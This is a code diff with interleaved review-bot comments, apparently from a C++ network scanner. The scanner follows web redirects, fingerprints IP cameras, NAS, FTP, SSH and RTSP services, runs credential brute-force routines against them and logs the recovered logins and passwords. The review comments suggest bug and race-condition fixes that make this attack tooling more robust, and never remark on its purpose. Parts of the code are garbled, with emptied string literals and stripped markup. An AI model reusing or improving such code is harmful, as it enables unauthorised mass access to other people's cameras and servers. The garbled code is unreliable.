16 : hm) - 2); + strcat(finalstr, " "); + if (strstri(ptr1, "")) != NULL) { + char *ptr2 = strstri(ptr1, ""); + int sz = ptr2 - ptr1; + + strncat(finalstr, ptr1 + 4, (sz > 64 ? 64 : sz) - 4); + } + else if ((ptr1 = strstri(str, "")) != NULL) + { + if (strstri(ptr1, "") != NULL) secondStr = strstri(ptr1, ""); + else + { + strcpy(finalstr, "[Corrupted title]"); + return finalstr; + }; + int hm = (int)(secondStr - ptr1); + strncat(finalstr, ptr1 + 18, (hm > 127 ? 30 : hm) - 18); + } + else if ((ptr1 = strstri(str, "")) != NULL) + { + if (strstri(ptr1, "") != NULL) secondStr = strstri(ptr1, ""); + int hm = (int)(secondStr - ptr1); + strncat(finalstr, ptr1 + 20, (hm > 127 ? 30 : hm) - 20); + } + else if ((ptr1 = strstri(str, "") != NULL) + { + char *str3 = strstri(str2, ">"); + + int y = str3 - str2; + if (y > 256) + { + strcpy(finalstr, "[Strange title]"); + } + else + { + strncat(finalstr, (char*)(str2 + strlen("title=")), y); + strcat(finalstr, "::"); + }; }; }; - }; - } - - if (strlen(finalstr) == 0) { + } - if ((ptr1 = strstri(str, "")) != NULL) { - char *ptr2 = strstri(ptr1, ""); - if (NULL != ptr2) { - int sz = ptr2 - ptr1; + if (strlen(finalstr) == 0) { - if (ptr1 + 6 == ptr2) { - strcat(finalstr, "[Empty body]"); + if ((ptr1 = strstri(str, "")) != NULL) { + char *ptr2 = strstri(ptr1, ""); + if (NULL != ptr2) { + int sz = ptr2 - ptr1; + + if (ptr1 + 6 == ptr2) { + strcat(finalstr, "[Empty body]"); + } + else { + strncat(finalstr, ptr1 + 6, (sz > 64 ? 64 : sz) - 6); + } } else { - strncat(finalstr, ptr1 + 6, (sz > 64 ? 64 : sz) - 6); + strcat(finalstr, "No closing tag found."); } } - else { - strcat(finalstr, "No closing tag found."); - } - } - else if ((ptr1 = strstri(str, "")) != NULL) { - char *ptr2 = strstri(ptr1, ""); - if (NULL != ptr2) { - int sz = ptr2 - ptr1; + else if ((ptr1 = strstri(str, "")) != NULL) { + char *ptr2 = strstri(ptr1, ""); + if (NULL != ptr2) { + int sz = ptr2 - ptr1; - strncat(finalstr, ptr1 + 6, (sz > 64 ? 
64 : sz) - 6); + strncat(finalstr, ptr1 + 6, (sz > 64 ? 64 : sz) - 6); + } + else { + strcat(finalstr, "No closing tag found."); + } + } + else if ((ptr1 = strstri(str, "\r\n\r\n")) != NULL) { + strncat(finalstr, ptr1 + 4, 128); } else { - strcat(finalstr, "No closing tag found."); + int sz = strlen(str); + strncat(finalstr, str, sz < 64 ? sz : 64); } } - else if ((ptr1 = strstri(str, "\r\n\r\n")) != NULL) { - strncat(finalstr, ptr1 + 4, 128); - } - else { - int sz = strlen(str); - strncat(finalstr, str, sz < 64 ? sz : 64); - } - } - std::string result = ""; + std::string result = ""; - if (flag == 1) { - result = "[PK]"; - } + if (flag == 1) { + result = "[PK]"; + } - result += std::string(finalstr); - return result; + result += std::string(finalstr); + return result; + } } -bool equivRedirectHandler(std::string *buff, char* ip, int port, Lexems *counter) { +std::string equivRedirectHandler(std::string *buff, char* ip, int port, Lexems *counter) { if (NULL == buff || 0 == buff->size()) { - return false; + return ""; } if (counter->iterationCount > 2) { /*stt->doEmitionFoundData("[" + QString(ip) + ":" + QString::number(port) + "] - infinite loop detected.");*/ - return false; + return ""; } std::string buffcpy = *buff; 
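Review bot: The new `59 == flag` branch at the top of getTitle never checks the result of `strHeader.find("ver: ")`: on a miss `npos` is narrowed to -1, `strStart + 5` becomes 4, and `substr(4)` either returns unrelated bytes from offset 4 or throws `std::out_of_range` when the response is shorter than four characters. Guard it with `const size_t strStart = strHeader.find("ver: "); if (strStart == std::string::npos) return "";`. `"ver: "` presumably targets the tail of a `Server: ` header; the match is case-sensitive and not anchored to a line start, so a comment naming the intended header would help. The literal `59` duplicates the value returned by sharedDetector, and the rest of the hunk is re-indentation of the existing body.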
@@ -2540,19 +2641,19 @@ bool equivRedirectHandler(std::string *buff, char* ip, int port, Lexems *counter if (-1 == pos) pos = STRSTR((const std::string *) &buffcpy, "http-equiv=refresh"); if (-1 == pos) pos = STRSTR((const std::string *) &buffcpy, "http-equiv='refresh'"); if (-1 == pos) { - return false; + return ""; } const std::string tempString = buffcpy.substr(pos + 17); int urlPos = STRSTR(&tempString, "url="); if (-1 == urlPos) { - return false; + return ""; } int delimPosFirst = tempString.find_first_of(" \n>\"'", urlPos); int delimPosSecond = tempString.find_first_of(" \n>\"'", delimPosFirst); - std::string location; + std::string location = ""; if (delimPosFirst == delimPosSecond) { location = tempString.substr(urlPos + 4, delimPosFirst - (urlPos + 4)); } @@ -2563,11 +2664,10 @@ bool equivRedirectHandler(std::string *buff, char* ip, int port, Lexems *counter Connector con; int newPort = port; if (location[0] == '/') { - std::string tIP = std::string(ip) + ":" + std::to_string(port) + location; + std::string tIP = std::string(ip) + location; if (gDebugMode) { stt->doEmitionYellowFoundData("[Redirecting to -> " + QString(tIP.c_str()) + ":" + QString::number(port) + - "]"); + "/\">" + QString(tIP.c_str()) + "]"); } con.nConnect(tIP.c_str(), port, &buffcpy); 
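Review bot: In equivRedirectHandler the delimiter search result is used without an `npos` check: if `find_first_of` finds nothing, `delimPosFirst` is -1 and `delimPosFirst - (urlPos + 4)` becomes a huge count, so `location` takes everything to the end of the response and is later handed to `nConnect`. The second search starts at `delimPosFirst` itself, so it returns the same index and `delimPosFirst == delimPosSecond` is always true; any `else` arm (outside this hunk) looks unreachable. Return `""` when `delimPosFirst` is -1, and start the second search at `delimPosFirst + 1` if a distinct closing delimiter is intended. The return type changes from `bool` to `std::string`, so callers that tested the result as a boolean need the same update; they are not visible here.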
@@ -2577,25 +2677,24 @@ bool equivRedirectHandler(std::string *buff, char* ip, int port, Lexems *counter int portPos = location.find(":", 7); if (-1 != portPos) { - int portPosEnd = location.find("/ \n>\"'", portPos + 7); + int portPosEnd = location.find("/ \n>\"'", portPos); if (-1 != portPosEnd) { newPort = std::stoi(location.substr(portPos + 1, portPosEnd)); if (gDebugMode) { stt->doEmitionYellowFoundData("[Redirecting to -> " + QString(location.c_str()) + ":" + QString::number(port) + - "]"); + "/\">" + QString(location.c_str()) + "]"); } con.nConnect(location.c_str(), newPort, &buffcpy); } else { - stt->doEmitionYellowFoundData(QString(ip) + ":" + QString(port) + " Redirector error -> " + QString(location.c_str())); + stt->doEmitionYellowFoundData(QString(ip) + " Redirector error -> " + QString(location.c_str())); + return ""; } } else { if (gDebugMode) { stt->doEmitionYellowFoundData("[Redirecting to -> " + QString(location.c_str()) + ":" + QString::number(port) + - "]"); + "/\">" + QString(location.c_str()) + "]"); } con.nConnect(location.c_str(), port, &buffcpy); } 
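Review bot: The http branch still calls `location.find("/ \n>\"'", portPos)`, which looks for that exact six-character sequence rather than any one of the characters; the https branch in the next hunk was changed to `find_first_of`, and this one should match: `int portPosEnd = location.find_first_of("/ \n>\"'", portPos);`. In both branches `location.substr(portPos + 1, portPosEnd)` passes an end index where `substr` expects a length, and `std::stoi` throws on non-numeric or out-of-range text that comes straight from the remote page. Use `substr(portPos + 1, portPosEnd - portPos - 1)`, wrap the conversion in `try`/`catch`, and reject values outside 1–65535 before calling `nConnect`. equivRedirectHandler starts and ends outside this hunk.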
@@ -2605,25 +2704,24 @@ bool equivRedirectHandler(std::string *buff, char* ip, int port, Lexems *counter int portPos = location.find(":", 8); if (-1 != portPos) { - int portPosEnd = location.find("/ \n>\"'", portPos + 8); + int portPosEnd = location.find_first_of("/ \n>\"'", portPos); if (-1 != portPosEnd) { newPort = std::stoi(location.substr(portPos + 1, portPosEnd)); if (gDebugMode) { stt->doEmitionYellowFoundData("[Redirecting to -> " + QString(location.c_str()) + ":" + QString::number(port) + - "]"); + "/\">" + QString(location.c_str()) + "]"); } con.nConnect(location.c_str(), newPort, &buffcpy); } else { - stt->doEmitionYellowFoundData(QString(ip) + ":" + QString(port) + " Redirector error -> " + QString(location.c_str())); + stt->doEmitionYellowFoundData(QString(ip) + " Redirector error -> " + QString(location.c_str())); + return ""; } } else { if (gDebugMode) { stt->doEmitionYellowFoundData("[Redirecting to -> " + QString(location.c_str()) + ":" + QString::number(port) + - "]"); + "/\">" + QString(location.c_str()) + "]"); } con.nConnect(location.c_str(), 443, &buffcpy); } 
@@ -2632,20 +2730,25 @@ bool equivRedirectHandler(std::string *buff, char* ip, int port, Lexems *counter std::string tIP = std::string(ip) + (location[0] == '/' ? "" : "/") + location; if (gDebugMode) { stt->doEmitionYellowFoundData("[Redirecting to -> " + QString(tIP.c_str()) + ":" + QString::number(port) + - "]"); + "/\">" + QString(tIP.c_str()) + "]"); } con.nConnect(tIP.c_str(), port, &buffcpy); } ++counter->iterationCount; - equivRedirectHandler(&buffcpy, ip, newPort, counter); + const std::string &locationEquiv = equivRedirectHandler(&buffcpy, ip, newPort, counter); - buff->clear(); - buff->assign(buffcpy); + if (locationEquiv.size() > 0) { + location = locationEquiv; + } + + if (buffcpy.size() > 0) { + buff->clear(); + buff->assign(buffcpy); + } - return buff->size() > 0; + return location; } std::string getScriptField(std::string *buff) { int pos1 = STRSTR((const std::string *)buff, "size()) { - return false; + return ""; } if (counter->iterationCount > 3) { //stt->doEmitionFoundData(QString(ip) + ":" + QString::number(port) + " - infinite loop detected."); - return false; + return ""; } const std::string &buffcpy_ref = getScriptField(buff); std::string buffcpy = buffcpy_ref; int sz = buffcpy.size(); - if (sz > 500) return false; + if (sz > 500) return ""; int pos = STRSTR((const std::string *) &buffcpy, "location.href ="); if (-1 == pos) pos = STRSTR((const std::string *) &buffcpy, "location.href="); if (-1 == pos) pos = STRSTR((const std::string *) &buffcpy, "location.replace"); if (-1 == pos) { - return false; + return ""; } int eqPos = buffcpy.find_first_of("=(", pos); @@ -2719,7 +2822,7 @@ bool jsRedirectHandler(std::string *buff, char* ip, int port, Lexems *counter) { std::string subRedirect = buffcpy.substr(spacePosFirst + 1, spacePosSecond - spacePosFirst - 1); int quotePosFirst = subRedirect.find_first_of("\"'"); if (-1 == quotePosFirst) { - return false; + return ""; } int quotePosSecond = subRedirect.find_first_of("\"'", quotePosFirst + 1); 
@@ -2761,19 +2864,24 @@ bool jsRedirectHandler(std::string *buff, char* ip, int port, Lexems *counter) { Connector con; if (gDebugMode) { stt->doEmitionYellowFoundData("[Redirecting to -> " + QString(location.c_str()) + ":" + QString::number(port) + - "]"); + "/\">" + QString(location.c_str()) + "]"); } con.nConnect(location.c_str(), port, &buffcpy); ++counter->iterationCount; - jsRedirectHandler(&buffcpy, ip, port, counter); + const std::string &locationJS = jsRedirectHandler(&buffcpy, ip, port, counter); - buff->clear(); - buff->assign(buffcpy); + if (locationJS.size() > 0) { + location = locationJS; + } - return buff->size() > 0; + if (buffcpy.size() > 0) { + buff->clear(); + buff->assign(buffcpy); + } + + return location; } std::string getHeader(const std::string *buffcpy, const int flag) { if (STRSTR(buffcpy, "substr(0, 128); } + else if (STRSTR(buffcpy, "camera") != -1 || STRSTR(buffcpy, "ipcam") != -1) { + result = "[Probably IPCamera] " + result; + } return result; } } #define RVI_START_FILE "\n\t\n\t\t" -void parseFlag(int flag, char* ip, int port, int size, const std::string &header, char* cp) { +void parseFlag(int flag, char* ip, char *ipRaw, int port, std::string *buff, const std::string &header, char* cp) { + int size = buff->size(); //Streaming server? if (size > 180000) { putInFile(flag, ip, port, size, "[Overflow]", cp); @@ -2829,7 +2941,7 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header } //Auth else if (flag == 2) { - _specBrute(ip, port, header.c_str(), flag, "/", "", cp, size); + _specBrute(ip, port, header.c_str(), flag, "", "", cp, size, true, true); } //FTP else if (flag == 3) { 
@@ -2848,7 +2960,7 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header sprintf(logEmit, "[FTP]:ftp://%s:%s@%s (F:%d)", lps.login, lps.pass, ip, lps.login, lps.pass, ip, ps.directoryCount); - fputsf(log, flag, "FTP"); + fputsf(log, flag); fillGlobalLogData(ip, port, std::to_string(size).c_str(), "[FTP service]", lps.login, lps.pass, "NULL", cp, "FTP"); @@ -2864,7 +2976,7 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header sprintf(logEmit, "[FTP]:ftp://%s:%s@%s [ROUTER]", lps.login, lps.pass, ip, lps.login, lps.pass, ip, ip); - fputsf(log, flag, "FTP"); + fputsf(log, flag); fillGlobalLogData(ip, port, std::to_string(size).c_str(), "[FTP service]", lps.login, lps.pass, "Router FTP.", cp, "FTP"); @@ -2873,20 +2985,24 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header else if (strstr(lps.login, "Unknown protocol") != NULL) { strcat(log, "; [!] USER/PASS commands failed. Dunno what to do."); - fputsf(log, flag, ""); + fputsf(log, flag); stt->doEmitionFoundData(QString::fromLocal8Bit(log)); }; } + + const std::string &cookieRef = Utils::getHeaderValue(buff, "Set-Cookie: ", "Cookie: "); + std::string cookie = cookieRef; + if (flag == 4 && HikVis::isInitialized) { HikVis hv; lopaStr lps = hv.HVLobby(ip, port); if (strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0) { - _specFillerBA(ip, port, "[Hikvision IVMS]", lps.login, lps.pass, 0); - fillGlobalLogData(ip, port, std::to_string(size).c_str(), "[Hikvision IVMS] ()", - lps.login, lps.pass, "[Hikvision IVMS]", "UTF-8", "Basic Authorization"); + _specFillerCustom(ip, port, "[Hikvision IVMS]", lps.login, lps.pass, 0, "[SVC]"); + //fillGlobalLogData(ip, port, std::to_string(size).c_str(), "[Hikvision IVMS] ()", + // lps.login, lps.pass, "[Hikvision IVMS]", "UTF-8", "Basic Authorization"); while (hikkaStop) Sleep(10); hikkaStop = true; 
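Review bot: In the `-2873` hunk, `while (hikkaStop) Sleep(10); hikkaStop = true;` is not an atomic acquire: two threads can both read `false`, both leave the loop and both set the flag, after which they run whatever the flag guards at the same time. `hikkaStop` is declared as a `std::atomic` earlier in the file (presumably `std::atomic<bool>`), so test and set can be one operation, `while (hikkaStop.exchange(true)) Sleep(10);`, or the section can take a `std::mutex`. The same pattern guards `rviStop` in the next hunk. The `Set-Cookie` lookup added just above runs for every `flag` although only the `_specWEBIPCAMBrute` branches use `cookie`, and the intermediate reference is unnecessary: `std::string cookie = Utils::getHeaderValue(buff, "Set-Cookie: ", "Cookie: ");`.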
@@ -2918,9 +3034,9 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header lopaStr lps = hv.RVILobby(ip, port); if (strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0) { - _specFillerBA(ip, port, "[RVI]", lps.login, lps.pass, 0); - fillGlobalLogData(ip, port, std::to_string(size).c_str(), "[RVI] ()", - lps.login, lps.pass, "[RVI]", "UTF-8", "Basic Authorization"); + _specFillerCustom(ip, port, "[RVI]", lps.login, lps.pass, 0, "[SVC]"); + /*fillGlobalLogData(ip, port, std::to_string(size).c_str(), "[RVI] ()", + lps.login, lps.pass, "[RVI]", "UTF-8", "Basic Authorization");*/ while (rviStop) Sleep(10); rviStop = true; @@ -3008,11 +3124,11 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header } else if (flag == 32) //IPC WEB ip cam { - _specWEBIPCAMBrute(ip, port, "[IPC] WEB IP Camera", flag, "WEB Authorization", cp, size, "IPC"); + _specWEBIPCAMBrute(ip, port, "[IPC] WEB IP Camera", flag, "WEB Authorization", cp, size, "IPC", &cookie); } else if (flag == 33) //GEOvision ip cam { - _specWEBIPCAMBrute(ip, port, "[GEO] WEB IP Camera", flag, "WEB Authorization", cp, size, "GEO"); + _specWEBIPCAMBrute(ip, port, "[GEO] WEB IP Camera", flag, "WEB Authorization", cp, size, "GEO", &cookie); } else if (flag == 34) //Hikvision ip cam { 
@@ -3022,11 +3138,11 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header } else if (flag == 35) //EasyCam { - _specWEBIPCAMBrute(ip, port, "[EasyCam] WEB IP Camera", flag, "WEB Authorization", cp, size, "EasyCam"); + _specWEBIPCAMBrute(ip, port, "[EasyCam] WEB IP Camera", flag, "WEB Authorization", cp, size, "EasyCam", &cookie); } else if (flag == 36) //Panasonic Cam { - _specBrute(ip, port, QString("[Panasonic] IP Camera (" + QString(ip) + ":" + QString::number(port) + ")").toLocal8Bit().data(), flag, + _specBrute(ip, port, QString("[Panasonic] IP Camera (" + QString(ip) + ")").toLocal8Bit().data(), flag, "/config/index.cgi", "Basic Authorization", cp, size); stt->doEmitionYellowFoundData("[PaCr]Panasonic IPCam, crawling started."); @@ -3051,15 +3167,15 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header } _specBrute(newIP.c_str(), nPort, QString("[Panasonic] IP Camera (" + - QString(newIP.c_str()) + ":" + QString::number(nPort) + ")").toLocal8Bit().data(), flag, + QString(newIP.c_str()) + ")").toLocal8Bit().data(), flag, (char*)newPath.c_str(), "Basic Authorization", cp, size); } } else stt->doEmitionRedFoundData("[Panasonic Cam URL] Cannot extract data " + - QString(ip) + ":" + QString::number(port)); + QString(ip)); } else stt->doEmitionRedFoundData("[Panasonic Cam cam_link] Cannot extract data " + - QString(ip) + ":" + QString::number(port)); + QString(ip)); } } else if (flag == 37) //Panasonic Cam @@ -3068,7 +3184,7 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header } else if (flag == 38) //Foscam { - _specWEBIPCAMBrute(ip, port, "[Foscam] IP Camera", flag, "Web Authorization", cp, size, "Foscam"); + _specWEBIPCAMBrute(ip, port, "[Foscam] IP Camera", flag, "Web Authorization", cp, size, "Foscam", &cookie); } else if (flag == 39) //EagleEye { 
@@ -3080,7 +3196,7 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header } else if (flag == 41) //AVIOSYS-camera { - _specWEBIPCAMBrute(ip, port, "[AVIOSYS] IP Camera", flag, "Web Authorization", cp, size, "AVIOSYS"); + _specWEBIPCAMBrute(ip, port, "[AVIOSYS] IP Camera", flag, "Web Authorization", cp, size, "AVIOSYS", &cookie); } else if (flag == 42) //NW_camera { @@ -3100,19 +3216,19 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header } else if (flag == 46) //Buffalo disk { - _specWEBIPCAMBrute(ip, port, "[Buffalo] Lan Disk", flag, "Web Authorization", cp, size, "BUFFALO"); + _specWEBIPCAMBrute(ip, port, "[Buffalo] Lan Disk", flag, "Web Authorization", cp, size, "BUFFALO", &cookie); } else if (flag == 47) //Digital Video Server { - _specWEBIPCAMBrute(ip, port, "[DVS] Camera", flag, "Web Authorization", cp, size, "DVS"); + _specWEBIPCAMBrute(ip, port, "[DVS] Camera", flag, "Web Authorization", cp, size, "DVS", &cookie); } else if (flag == 48) //ipCAM { - _specWEBIPCAMBrute(ip, port, "[ipCAM] Camera", flag, "Web Authorization", cp, size, "IPCAM"); + _specWEBIPCAMBrute(ip, port, "[ipCAM] Camera", flag, "Web Authorization", cp, size, "IPCAM", &cookie); } else if (flag == 49) //IEORFOREFOX { - _specWEBIPCAMBrute(ip, port, "[IEORFOREFOX] Camera", flag, "Web Authorization", cp, size, "IEORFOREFOX"); + _specWEBIPCAMBrute(ip, port, "[IEORFOREFOX] Camera", flag, "Web Authorization", cp, size, "IEORFOREFOX", &cookie); } else if (flag == 50) //IP Camera { 
@@ -3120,19 +3236,19 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header } else if (flag == 51) //MASPRO { - _specWEBIPCAMBrute(ip, port, "[MASPRO] WEB IP Camera", flag, "WEB Authorization", cp, size, "MASPRO"); + _specWEBIPCAMBrute(ip, port, "[MASPRO] WEB IP Camera", flag, "WEB Authorization", cp, size, "MASPRO", &cookie); } else if (flag == 52) //webcamxp5 { - _specWEBIPCAMBrute(ip, port, "[WEBCAMXP] WEB IP Camera", flag, "WEB Authorization", cp, size, "WEBCAMXP"); + _specWEBIPCAMBrute(ip, port, "[WEBCAMXP] WEB IP Camera", flag, "WEB Authorization", cp, size, "WEBCAMXP", &cookie); } else if (flag == 53) //Jassun { - _specWEBIPCAMBrute(ip, port, "[JASSUN] WEB IP Camera", flag, "WEB Authorization", cp, size, "JASSUN"); + _specWEBIPCAMBrute(ip, port, "[JASSUN] WEB IP Camera", flag, "WEB Authorization", cp, size, "JASSUN", &cookie); } else if (flag == 54) //Beward { - _specWEBIPCAMBrute(ip, port, "[BEWARD] WEB IP Camera", flag, "WEB Authorization", cp, size, "BEWARD"); + _specWEBIPCAMBrute(ip, port, "[BEWARD] WEB IP Camera", flag, "WEB Authorization", cp, size, "BEWARD", &cookie); } else if (flag == 55) //QCam { 
@@ -3144,12 +3260,30 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header } else if (flag == 57) //Juan { - _specWEBIPCAMBrute(ip, port, "[JUAN] WEB IP Camera", flag, "WEB Authorization", cp, size, "JUAN"); + _specWEBIPCAMBrute(ip, port, "[JUAN] WEB IP Camera", flag, "WEB Authorization", cp, size, "JUAN", &cookie); } else if (flag == 58) //QLikView { + stt->doEmitionRedFoundData("QLikView found. " + QString(ip)); _specBrute(ip, port, "[QLikView] IP Camera", flag, "/QvAJAXZfc/Authenticate.aspx?_=1453661324640", "Basic Authorization", cp, size); } + else if (flag == 59) //RTSP + { + //char newIP[128] = {0}; + //strcpy(newIP, "rtsp://"); + //strncat(newIP, ipRaw, 96); + //strcat(newIP, "/"); + _specRTSPBrute(ipRaw, port, header.c_str(), flag, "RTSP", cp, size); + } + else if (flag == 60) //ACTi + { + _specWEBIPCAMBrute(ip, port, "[ACTi] WEB IP Camera", flag, "WEB Authorization", cp, size, "ACTi", &cookie); + } + else if (flag == 61) //AirOS + { + _specWEBIPCAMBrute(ip, port, "[AirOS] WEB IP Camera", flag, "WEB Authorization", cp, size, "AirOS", &cookie); + } + else if (flag == 20) //AXIS Camera { if (_specBrute(ip, port, "AXIS Camera", flag, "/mjpg/video.mjpg", "Basic Authorization", cp, size) == -1) { @@ -3191,12 +3325,12 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header char log[512] = { 0 }; ++PieCamerasC1; ++camerasC1; - const lopaStr &lps = BA::BALobby((string(ip) + "/~login").c_str(), port); + const lopaStr &lps = BA::BALobby((string(ip) + "/~login").c_str(), port, false); sprintf(log, "[HFS]:%s:%d T: %s Pass: %s:%s", ip, port, ip, port, header.c_str(), lps.login, lps.pass); fillGlobalLogData(ip, port, std::to_string(size).c_str(), header.c_str(), lps.login, lps.pass, "HFS-FTP", cp, "Basic Authorization"); - fputsf(log, flag, "HFS"); + fputsf(log, flag); stt->doEmitionFoundData(QString::fromLocal8Bit(log)); } //else if (flag == 1) 
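Review bot: The `sprintf(log, ...)` kept as context in the flag 15 (HFS) branch writes into `char log[512]` with no length limit, and one of its arguments is `header.c_str()`, which appears to be text taken from the remote host's response. A long enough header overruns the stack buffer. Since this commit already edits the two neighbouring calls, switch to `snprintf(log, sizeof(log), ...)` with the same format and arguments. The format string shown on this page seems to have lost markup, so check its specifier count against the seven arguments in the real file. The branch sits inside `parseFlag`, which starts and ends outside the hunk.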
@@ -3220,15 +3354,27 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header // putInFile(flag, ip, port, size, finalstr, cp); //}; } -void handleRedirects(std::string *buffcpy, char* ip, int port) { - +std::string handleRedirects(std::string *buffcpy, char* ip, int port) { Lexems counter; counter.iterationCount = 0; - equivRedirectHandler(buffcpy, ip, port, &counter); + std::string location = std::string(ip); + const std::string &locationEquiv = equivRedirectHandler(buffcpy, ip, port, &counter); + location += locationEquiv; + counter.iterationCount = 0; - jsRedirectHandler(buffcpy, ip, port, &counter); + if (Utils::ustrstr((const std::string *) buffcpy, "size()) { return flag; } 
@@ -3236,9 +3382,12 @@ int handleFramesets(std::string *buffcpyOrig, char* ip, int port, int flag) { std::string buffcpy = *buffcpyOrig; std::transform(buffcpy.begin(), buffcpy.end(), buffcpy.begin(), ::tolower); + const std::string &constHeadRef = getHeader((const std::string *) buffcpyOrig, flag); + std::string header = constHeadRef; + int pos; if ((pos = STRSTR(buffcpy, " 5) { - return 0; - }; - if (location.size() == 0) { - continue; - } - std::string tIP = std::string(ip) + (location[0] == '/' ? "" : "/") + location; - std::string buff; - Sleep(5000); - int sz = con.nConnect(tIP.c_str(), port, &buff); - if (-1 == sz) { - continue; - } - int flg = contentFilter((const std::string *) &buff, port, ip, "UTF-8", sz); - if (flg == -1) { - return -1; - } - else if (flg > 1) { + std::string location = frameString.substr(quotePos1 + 1, quotePos2 - quotePos1 - 1); + if (counter++ > 5) { + return 0; + }; + if (location.size() == 0) { + continue; + } + std::string tIP = std::string(ip) + (location[0] == '/' ? 
"" : "/") + location; + std::string buff; + Sleep(1000); + int sz = con.nConnect(tIP.c_str(), port, &buff); + if (-1 == sz) { + continue; + } + int flg = contentFilter((const std::string *) &buff, port, tIP.c_str(), "UTF-8", sz); + if (flg == -1) { + return -1; + } + else { + if (2 == flg) { + const std::string &headerBA = getHeader((const std::string *) &buff, flg); + parseFlag(flg, (char*)tIP.c_str(), ipRaw, port, &buff, headerBA, cp); return flg; } + else { + header += " - " + getHeader((const std::string *) &buff, flg); + } + } //} } } } } } - return flag; -} -int Lexems::filler(char* ip, int port, std::string *buffcpy, int size, Lexems *lx) -{ - if (port == 22) { - _saveSSH(ip, 22, size, buffcpy->c_str()); - return -1; - } - else if (Utils::ustrstr((const std::string *) buffcpy, "SSH-2.0-OpenSSH") != -1 || - Utils::ustrstr((const std::string *) buffcpy, "SSH-2.0-mod_sftp") != -1) { - std::string sshBuff; - int res = SSHAuth::SSHLobby(ip, port, &sshBuff); - if (res != -1 && res != -2) _saveSSH(ip, port, size, (char*)sshBuff.c_str()); - return -1; - }; - handleRedirects(buffcpy, ip, port); - - char cp[32] = { 0 }; - strncpy(cp, getCodePage(buffcpy->c_str()), 32); - int flag = contentFilter((const std::string *) buffcpy, port, ip, cp, size); - if (flag != -1) { - const std::string &header = getHeader((const std::string *) buffcpy, flag); - if (flag < 2 || flag > 6) { - if ((flag = handleFramesets(buffcpy, ip, port, flag)) == -1) { - return -1; + std::string newIP = std::string(ip); + int newPort = port; + std::string location = Utils::getHeaderValue(buffcpyOrig, "Location: ", ""); + if (location.size() > 0) { + if (location.find("http://") != -1) { + if (location.at(location.size() - 1) == '/') { + location = location.substr(0, location.size() - 1); } - parseFlag(flag, ip, port, size, header, cp); + newPort = port; + int portPos = location.find(":", 8); + if (-1 != portPos) { + newPort = std::stoi(location.substr(portPos + 1)); + } + newIP = location; + } + else 
if (location.find("https://") != -1) { + if (location.at(location.size() - 1) == '/') { + location = location.substr(0, location.size() - 1); + } + newPort = 443; + int portPos = location.find(":", 8); + if (-1 != portPos) { + newPort = std::stoi(location.substr(portPos + 1)); + } + newIP = location; } else { - parseFlag(flag, ip, port, size, header, cp); + newIP += location; } + } + stt->doEmitionYellowFoundData("Location: " + QString(newIP.c_str()) + "; Port: " + QString::number(newPort)); + parseFlag(flag, (char*)newIP.c_str(), ipRaw, newPort, buffcpyOrig, header, cp); + return flag; +} +int Lexems::filler(char* ip, char *ipRaw, int port, std::string *buffcpy, int size, Lexems *lx) +{ + if (0 == size) { + int flag = contentFilter((const std::string *) buffcpy, port, ip, NULL, size); + parseFlag(flag, ip, ipRaw, port, buffcpy, "Empty", NULL); return flag; } else { - return -1; + if (port == 22) { + _saveSSH(ip, 22, size, buffcpy->c_str()); + return -1; + } + else if (Utils::ustrstr((const std::string *) buffcpy, "SSH-2.0-OpenSSH") != -1 || + Utils::ustrstr((const std::string *) buffcpy, "SSH-2.0-mod_sftp") != -1) { + std::string sshBuff; + int res = SSHAuth::SSHLobby(ip, port, &sshBuff); + if (res != -1 && res != -2) _saveSSH(ip, port, size, (char*)sshBuff.c_str()); + return -1; + }; + + const std::string &location = handleRedirects(buffcpy, ip, port); + + char cp[32] = { 0 }; + strncpy(cp, getCodePage(buffcpy->c_str()), 32); + int flag = contentFilter((const std::string *) buffcpy, port, (location.size() > 0 ? location.c_str() : ip), cp, size); + if (flag != -1) { + const std::string &header = getHeader((const std::string *) buffcpy, flag); + if (flag < 2 || flag > 6) { + if ((flag = handleFramesets(buffcpy, (location.size() > 0 ? (char*)location.c_str() : ip), ipRaw, port, flag, cp)) == -1) { + return -1; + } + } + else { + parseFlag(flag, (location.size() > 0 ? 
(char*)location.c_str() : ip), ipRaw, port, buffcpy, header, cp); + } + return flag; + } + else { + return -1; + } } - - - - - - - - - - - - //PathStr ps; - //ps.port = port; - //strcpy(ps.ip, ip); - //ZeroMemory(ps.headr, sizeof(ps.headr)); - //ZeroMemory(ps.path, sizeof(ps.path)); - //char finalstr[TITLE_MAX_SIZE] = { 0 }; - //int flag = 0; - //char cp[32] = { 0 }; - //strcpy(cp, getCodePage(buffcpy->c_str())); - //if ((flag = ContentFilter(buffcpy, port, ip, cp, size)) == -1) return -1; - - //strcpy(ps.headr, GetTitle(buffcpy->c_str())); - //ps.flag = flag; - - //char baPath[256] = { 0 }; - - //std::vector redirStrLst; - //if (flag == 0 || flag == 3 || flag == 7) - //{ - // int rh = getHeader(ip, port, buffcpy->c_str(), lx, &ps, &redirStrLst, size); - // strcpy(cp, ps.codepage); - - // if (rh == -1) return -1; - - // if (rh <= -2) - // { - // flag = ps.flag; - // strcat(finalstr, ps.headr); - // port = ps.port; - // strcpy(ip, ps.ip); - // }; - - // int sz = strlen(ps.path); - // strncpy(baPath, ps.path, (sz < 256 ? 
